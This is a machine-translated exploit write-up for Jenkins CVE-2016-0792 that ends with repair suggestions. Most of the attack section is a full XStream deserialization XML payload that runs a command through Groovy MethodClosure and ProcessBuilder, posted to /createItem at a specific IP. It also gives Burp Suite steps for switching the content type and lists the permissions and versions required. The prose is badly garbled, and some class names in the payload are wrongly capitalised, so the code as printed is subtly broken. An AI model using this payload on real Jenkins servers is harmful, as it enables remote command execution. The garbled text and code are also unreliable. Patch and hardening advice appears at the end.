jenkins-cve-2016-0792 Exploit and repair suggestion

Vulnerability Overview:

Foreign website contrast Security in the year 2 months in the public Jenkins recently repaired one can be called by a low-privileged user API service-led command execution vulnerability details. a malicious XML document is constructed with a low-privileged user to send to the server-side interface , which invokes the API to execute external commands when parsing the server.

Utilization method: 1. Login low-Privileged usersTest

Permissions are:Overall 's read permission +job Create permission

Post The following XML packet to the Create project page, the project name is arbitrarily named, here to take qt-sec , complete link is as follows:

Http://178.18.120.133:8181/createItem?name=qt-sec

The XML packet is as follows ( The red part of the string node is the command and object to execute):

<map>

<entry>

<groovy.util.Expando>

<expandoProperties>

<entry>

<string>hashCode</string>

<org.codehaus.groovy.runtime.MethodClosure>

<delegate class= "Groovy.util.Expando" reference= ". /.. /.. /.." />

<owner class= "Java.lang.ProcessBuilder" >

<command>

<string>touch</string>

<string>/tmp/qingteng-test-1</string>

</command>

<redirectErrorStream>false</redirectErrorStream>

</owner>

<resolveStrategy>0</resolveStrategy>

<directive>0</directive>

<parameterTypes/>

<maximumNumberOfParameters>0</maximumNumberOfParameters>

<method>start</method>

</org.codehaus.groovy.runtime.MethodClosure>

</entry>

</expandoProperties>

</groovy.util.Expando>

<int>1</int>

</entry>

</map>

2. ByBurpsuiteIntercepting modification Packets

Simply change the content-type:application/x-www-form-urlencoded to Content-type:application/xml andsend the packet.

Intercepts the packet, does not make the modification sends , produces the response status code, and reports "No mode given" error, the test found that the command failed to execute:

Intercepts the packet, modifies the content type value, generates a response status code, executes the test command successfully, and creates the Qingteng-test-1 file under the tmp directory of the target server:

The resulting files are as follows:

Utilization Summary: 1. Permission restrictions:

Regardless of the anonymous user or the logged-on user, the permissions must have theOverall read permission and the Job 's create Permissions "Two permissions (of course with more permissions the better, if you have Administrater permissions, any other permissions are not required, because Administrater for the highest privilege, so this is not considered Administrater ). because the vulnerability is the use of CreateItem create job function to invoke the API, so create is necessary, and Jenkins most basic permission is overall Read permission, the user must give Read permission, otherwise can not see anything.

2. Version restrictions:

Jenkins version is less than 1.650 (1.650 version fixed the issue)

3. Postdata content Type:

When constructing a malicious XML document to send to the server-side interface , the content type should be aware of XML.

Safety reinforcement

L Update Jenkins to the latest version 1.650 above.

L Jenkins do access control, the income intranet is not open to the outside network.

L prohibit anonymous access to Jenkins.

l Ensure that each Jenkins account is not a weak password.

Reference Links:

Https://www.contrastsecurity.com/security-influencers/serialization-must-die-act-2-xstream

https://www.seebug.org/vuldb/ssvid-90813

Https://www.youtube.com/watch?v=JgjYrwqI6nA

http://blog.csdn.net/wangmuming/article/details/22926025

jenkins-cve-2016-0792 Exploit and repair suggestion